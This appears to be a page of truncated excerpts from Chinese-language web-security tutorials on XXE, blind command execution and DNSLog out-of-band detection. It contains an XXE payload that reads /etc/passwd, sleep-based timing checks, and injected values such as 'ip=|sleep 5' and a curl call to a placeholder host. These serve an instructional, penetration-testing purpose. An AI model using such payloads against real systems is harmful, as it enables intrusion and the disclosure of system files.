轉載學習於紅日安全 一、有回顯 （1）直接將外部實體引用的URI設置為敏感目錄 <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> ...

一、命令執行判斷 命令執行可能會存在命令執行完沒有回顯，可以通過三種方式來判斷：延時、HTTP延時、DNS請求。 1、延時 1）通過使用sleep()函數，即是否延時來判斷該命令是否有執行，有延時則代表有執行。類似的函數還有 benchmark(count,expr) 和getlock ...

一、什么是DNSLog DNS的全稱是Domain Name System（網絡名稱系統），它作為將域名和IP地址相互映射，使人更方便地訪問互聯網。當用戶輸入某一網址如www.baidu.com，網 ...

0x01 原理 NS（Name Server）記錄是域名服務器記錄，用來指定該域名由哪個DNS服務器來進行解析 DNS：域名解析服務器 A記錄：指定域名對應的IP地址 一句話歸納😪😪 ...

測試一些網站的時候，一些注入都是無回顯的，我們可以寫腳本來進行盲注，但有些網站會ban掉我們的ip，這樣我們可以通過設置ip代理池解決， 但是盲注往往效率很低，所以產生了DNSlog注入 DNSLOG的原理 DNS的解析是遞歸與迭代相結合的，下面給出了當我們訪問 ...

0x01 DNSLOG回顯原理 測試一些網站的時候，一些注入都是無回顯的，我們可以寫腳本來進行盲注，但有些網站會ban掉我們的ip，這樣我們可以通過設置ip代理池解決， 但是盲注往往效率很低，所以產生了DNSlog注入。具體原理如下。 首先需要有一個可以配置的域名，比如：ceye.io ...

前言 本文主要講的是無回顯、不出網命令執行測試方法，首先通過大小寫判斷是linux還是win，然后通過命令自動查找目錄寫文件來測試。 這里沒有這種環境就拿一個php的做演示（其實像這種可以直接寫馬在當前目錄） 首先我們通過下面命令和響應包的時間判斷存在命令執行（適用於win linux下使用 ...

本文由學習https://xz.aliyun.com/t/8125中收獲得知識而來，附帶個人的一些思考。 甲、php無回顯時命令注入判斷方法 利用延時 ip=|sleep 5 HTTP請求 ip=|Curl 'http://x.x.x.x:233' Nc -lvv ...